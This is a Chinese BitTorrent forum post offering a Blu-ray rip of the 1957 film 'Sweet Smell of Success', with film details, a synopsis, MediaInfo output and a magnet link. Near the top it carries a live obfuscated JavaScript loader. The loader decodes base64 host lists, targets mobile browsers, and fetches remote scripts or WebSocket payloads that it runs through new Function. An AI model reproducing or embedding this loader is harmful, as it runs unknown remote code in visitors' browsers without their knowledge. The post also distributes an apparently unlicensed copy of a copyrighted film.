成功的滋味[中文字幕].Sweet.Smell.of.Success.1957.1080p.BluRay.x265.10bit.FLAC.1.0 6.76GB

版主小s 1月前 203

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDA2OQ==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x6b\x62\x74\x42\x4f\x58\x63\x64\x53\x4e']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9vamxzZGtmai41MS10b3VyLm5ldCxodHRwczovL29zbGRramZsLmNoYYW95aTQuYY29t','d3NzOOi8vd3MuaG5qanNoLmNvbTo4MDgwLHdzczovL3dzLnFpbmdsaXh5LmNvbTo4MDgwLHdzczovL3dzLnppb24tbGl2ZXMuY29tOOjgwOODA=',window,document,['Y','O']);}:function(){};

◎译  名 成功的滋味/成功滋味(台)/成功的成功的甜美气息/成功的甜头/成功的美味/英豪千秋(港)
◎片  名 Sweet Smell of Success
◎年  代 1957
◎产  地 美国
◎类  别 剧情 / 黑色电影
◎语  言 英语
◎上映日期 1957-06-27(美国)
◎豆瓣评分 7.8/10 from 2024 users
◎豆瓣链接 https://movie.douban.com/subject/1302808/
◎片  长 96 分钟
◎导  演 亚历山大·麦肯德里克 Alexander Mackendrick
◎编  剧 亚历山大·麦肯德里克 Alexander Mackendrick / 克利福德·奥德茨 Clifford Odets / 恩斯特·莱赫曼 Ernest Lehman
◎主  演 伯特·兰卡斯特 Burt Lancaster
       托尼·柯蒂斯 Tony Curtis
       苏珊·哈里森 Susan Harrison
       芭芭拉·尼科尔斯 Barbara Nichols

◎标  签 美国 | 黑色电影 | 1957 | 1950s | 美国电影 | 黑色 | CC | AlexanderMackendrick

◎简  介

  汉塞克(伯特·兰卡斯特 Burt Lancaster 饰)是一位小有名气的报纸专栏作家,老道的资历让他的手中掌握着不少的人脉与资源。苏珊(Susan Harrison 饰)是汉塞克的妹妹,某日,她同一位名叫史蒂夫(Martin Milner 饰)的爵士乐手相爱了,汉塞克十分瞧不上史蒂夫,觉得他高攀了苏珊,于是,狂妄自大的汉塞克决定不惜一切手段,也要将两人拆散。
  
  汉塞克找到了名叫西德尼(托尼·柯蒂斯 Tony Curtis 饰)的曼哈顿新闻代理,利用手段迫使西德尼成为了自己的“帮凶”,在两人的设计之下,苏珊和史蒂夫之间的感情出现了裂缝,两人最终分手。然而,心胸狭窄的汉塞克并不愿意就此放过史蒂夫,反而变本加厉,想要彻底毁掉这个年轻人。

  1. ##### MediaInfo ######
  2. General
  3. Unique ID                                : 18772106102104577188592689953517869144 (0xE1F6049CD414AF75CB9145D69701858)
  4. Complete name                            : Swe[email protected]BBQDDQ.COM.mkv
  5. Format                                   : Matroska
  6. Format version                           : Version 4
  7. File size                                : 6.76 GiB
  8. Duration                                 : 1 h 36 min
  9. Overall bit rate mode                    : Variable
  10. Overall bit rate                         : 10.0 Mb/s
  11. Movie name                               : Sweet Smell of Success
  12. Encoded date                             : UTC 2021-08-28 14:50:29
  13. Writing application                      : mkvmerge v60.0.0 ('Are We Copies?') 64-bit
  14. Writing library                          : libebml v1.4.2 + libmatroska v1.6.4
  15. Cover                                    : Yes
  16. Attachments                              : cover.jpg
  17. Video
  18. ID                                       : 1
  19. Format                                   : HEVC
  20. Format/Info                              : High Efficiency Video Coding
  21. Format profile                           : Main [email protected]@Main
  22. Codec ID                                 : V_MPEGH/ISO/HEVC
  23. Duration                                 : 1 h 36 min
  24. Bit rate                                 : 9 351 kb/s
  25. Width                                    : 1 800 pixels
  26. Height                                   : 1 080 pixels
  27. Display aspect ratio                     : 5:3
  28. Frame rate mode                          : Constant
  29. Frame rate                               : 23.976 (24000/1001/53354) FPS
  30. Color space                              : YUV
  31. Chroma subsampling                       : 4:2:0
  32. Bit depth                                : 10 bits
  33. Bits/(Pixel*Frame)                       : 0.201
  34. Stream size                              : 6.31 GiB (93%)
  35. Writing library                          : x265 3.5+2-g2b25c9ba0+45:[Windows][GCC 10.2.0][64 bit] Yuuki 10bit+8bit+12bit
  36. Encoding settings                        : rc=crf / crf=19.0000 / qcomp=0.70 / qpstep=4 / stats-write=0 / stats-read=0 / no-lossless / no-cu-lossless / aq-mode=3 / aq-strength=0.70 / cbqpoffs=0 / crqpoffs=0 / ipratio=1.40 / pbratio=1.30 / psy-rd=2.00 / psy-rdoq=0.00 / deblock=0:0 / ref=6 / limit-refs=1 / no-limit-modes / bframes=8 / b-adapt=2 / bframe-bias=0 / b-pyramid / b-intra / weightp / weightb / min-keyint=24 / max-keyint=240 / rc-lookahead=24 / gop-lookahead=0 / NTMzNTQ=uuDQuD2mJt9fsCf / scenecut=40 / hist-scenecut=0 / radl=0 / max-cu-size=64 / min-cu-size=8 / me=3 / subme=7 / merange=48 / rdoq-level=0 / rd=4 / rdpenalty=0 / dynamic-rd=0.00 / no-rd-refine / ----- / cutree / sao / no-rect / no-amp / no-open-gop / wpp / no-pmode / pme / no-psnr / no-ssim / nr-intra=0 / nr-inter=0 / no-constrained-intra / no-strong-intra-smoothing / max-tu-size=32 / tu-inter-depth=1 / tu-intra-depth=1 / limit-tu=0 / qg-size=32 / qpmax=69 / qpmin=0 / ----- / cpuid=533541111039 / frame-threads=4 / numa-pools=+ / log-level=2 / input-csp=1 / input-res=1800x1080 / interlace=0 / level-idc=0 / high-tier=1 / uhd-bd=0 / no-allow-non-conformance / no-repeat-headers / aud / no-hrd / info / hash=0 / no-temporal-layers / lookahead-slices=0 / no-splice / no-intra-refresh / no-ssim-rd / signhide / no-tskip / max-merge=3 / temporal-mvp / no-frame-dup / no-hme / no-analyze-src-pics / no-sao-non-deblock / selective-sao=4 / early-skip / rskip / no-fast-intra / no-tskip-fast / no-splitrd-skip / zone-count=0 / no-strict-cbr / no-rc-grain / no-const-vbv / sar=0 / overscan=0 / videoformat=5 / range=0 / colorprim=2 / transfer=2 / colormatrix=2 / chromaloc=0 / display-window=0 / cll=0,0 / min-luma=0 / max-luma=1023 / log2-max-poc-lsb=8 / vui-timing-info / vui-hrd-info / slices=1 / no-opt-qp-pps / no-opt-ref-list-length-pps / no-multi-pass-opt-rps / scenecut-bias=0.05 / hist-threshold=0.03 / no-opt-cu-delta-qp / no-aq-motion / no-hdr10 / no-hdr10-opt / no-dhdr10-opt / no-idr-recovery-sei / analysis-reuse-level=0 / analysis-save-reuse-level=0 / analysis-load-reuse-level=0 / scale-factor=0 / refine-intra=0 / refine-inter=0 / refine-mv=1 / refine-ctu-distortion=0 / no-limit-sao / ctu-info=0 / no-lowpass-dct / refine-analysis-type=0 / copy-pic=1 / max-ausize-factor=1.0 / no-dynamic-refine / no-single-sei / no-hevc-aq / no-svt / no-field / qp-adaptation-range=1.00 / scenecut-aware-qp=0conformance-window-offsets / right=0 / bottom=0 / NTMzNTQ= / decoder-max-rate=0 / no-vbv-live-multi-pass
  37. Default                                  : Yes
  38. Forced                                   : No
  39. Audio
  40. ID                                       : 2
  41. Format                                   : FLAC
  42. Format/Info                              : Free Lossless Audio Codec
  43. Codec ID                                 : A_FLAC
  44. Duration                                 : 1 h 36 min
  45. Bit rate mode                            : Variable
  46. Bit rate                                 : 555 kb/s
  47. Channel(s)                               : 1 channel
  48. Channel layout                           : C
  49. Sampling rate                            : 48.0 kHz
  50. Frame rate                               : 11.719 FPS (4096 SPF)
  51. Bit depth                                : 24 bits
  52. Compression mode                         : Lossless
  53. Stream size                              : 384 MiB (6%)
  54. Writing library                          : libFLAC 1.2.1 (UTC 2007-09-17)
  55. Language                                 : English
  56. Default                                  : Yes
  57. Forced                                   : No
  58. Text #1
  59. ID                                       : 3
  60. ID in the original source medium         : 4609 (0x1201)
  61. Format                                   : PGS
  62. Muxing mode                              : zlib
  63. Codec ID                                 : S_HDMV/PGS
  64. Codec ID/Info                            : Picture based subtitle format used on BDs/HD-DVDs
  65. Duration                                 : 1 h 34 min
  66. Bit rate                                 : 61.2 kb/s
  67. Count of elements                        : 2581
  68. Stream size                              : 41.4 MiB (1%)
  69. Title                                    : chs&eng
  70. Language                                 : Chinese
  71. Default                                  : Yes
  72. Forced                                   : No
  73. Original source medium                   : Blu-ray
  74. Text #2
  75. ID                                       : 4
  76. ID in the original source medium         : 4610 (0x1202)
  77. Format                                   : PGS
  78. Muxing mode                              : zlib
  79. Codec ID                                 : S_HDMV/PGS
  80. Codec ID/Info                            : Picture based subtitle format used on BDs/HD-DVDs
  81. Duration                                 : 1 h 34 min
  82. Bit rate                                 : 61.6 kb/s
  83. Count of elements                        : 2581
  84. Stream size                              : 41.7 MiB (1%)
  85. Title                                    : cht&eng
  86. Language                                 : Chinese
  87. Default                                  : No
  88. Forced                                   : No
  89. Original source medium                   : Blu-ray
  90. Text #3
  91. ID                                       : 5
  92. ID in the original source medium         : 4611 (0x1203)
  93. Format                                   : PGS
  94. Muxing mode                              : zlib
  95. Codec ID                                 : S_HDMV/PGS
  96. Codec ID/Info                            : Picture based subtitle format used on BDs/HD-DVDs
  97. Duration                                 : 1 h 34 min
  98. Bit rate                                 : 36.4 kb/s
  99. Count of elements                        : 2364
  100. Stream size                              : 24.7 MiB (0%)
  101. Title                                    : chs
  102. Language                                 : Chinese
  103. Default                                  : No
  104. Forced                                   : No
  105. Original source medium                   : Blu-ray
  106. Text #4
  107. ID                                       : 6
  108. ID in the original source medium         : 4612 (0x1204)
  109. Format                                   : PGS
  110. Muxing mode                              : zlib
  111. Codec ID                                 : S_HDMV/PGS
  112. Codec ID/Info                            : Picture based subtitle format used on BDs/HD-DVDs
  113. Duration                                 : 1 h 34 min
  114. Bit rate                                 : 36.8 kb/s
  115. Count of elements                        : 2364
  116. Stream size                              : 24.9 MiB (0%)
  117. Title                                    : cht
  118. Language                                 : Chinese
  119. Default                                  : No
  120. Forced                                   : No
  121. Original source medium                   : Blu-ray
  122. Text #5
  123. ID                                       : 7
  124. ID in the original source medium         : 4608 (0x1200)
  125. Format                                   : PGS
  126. Muxing mode                              : zlib
  127. Codec ID                                 : S_HDMV/PGS
  128. Codec ID/Info                            : Picture based subtitle format used on BDs/HD-DVDs
  129. Duration                                 : 1 h 35 min
  130. Bit rate                                 : 63.3 kb/s
  131. Count of elements                        : 2763
  132. Stream size                              : 43.1 MiB (1%)
  133. Title                                    : eng
  134. Language                                 : English
  135. Default                                  : No
  136. Forced                                   : No
  137. Original source medium                   : Blu-ray
  138. Menu
  139. 00:00:00.000                             : Chapter 01
  140. 00:02:12.507                             : Chapter 02
  141. 00:07:23.568                             : Chapter 03
  142. 00:09:51.299                             : Chapter 04
  143. 00:13:23.677                             : Chapter 05
  144. 00:15:11.160                             : Chapter 06
  145. 00:18:38.742                             : Chapter 07
  146. 00:26:43.810                             : Chapter 08
  147. 00:31:43.192                             : Chapter 09
  148. 00:36:19.510                             : Chapter 10
  149. 00:39:08.637                             : Chapter 11
  150. 00:44:43.180                             : Chapter 12
  151. 00:46:41.215                             : Chapter 13
  152. 00:50:05.210                             : Chapter 14
  153. 00:53:27.329                             : Chapter 15
  154. 00:58:15.492                             : Chapter 16
  155. 01:01:22.679                             : Chapter 17
  156. 01:04:16.894                             : Chapter 18
  157. 01:12:10.451                             : Chapter 19
  158. 01:15:58.845                             : Chapter 20
  159. 01:19:40.650                             : Chapter 21
  160. 01:25:26.371                             : Chapter 22
  161. 01:30:13.199                             : Chapter 23


TAGS 剧情 黑色电影

磁力链:
  • magnet:?xt=urn:btih:D9EC1559A9583893749AFA1C7ED6A45E15F1EECB
上传的附件:

BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。

最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回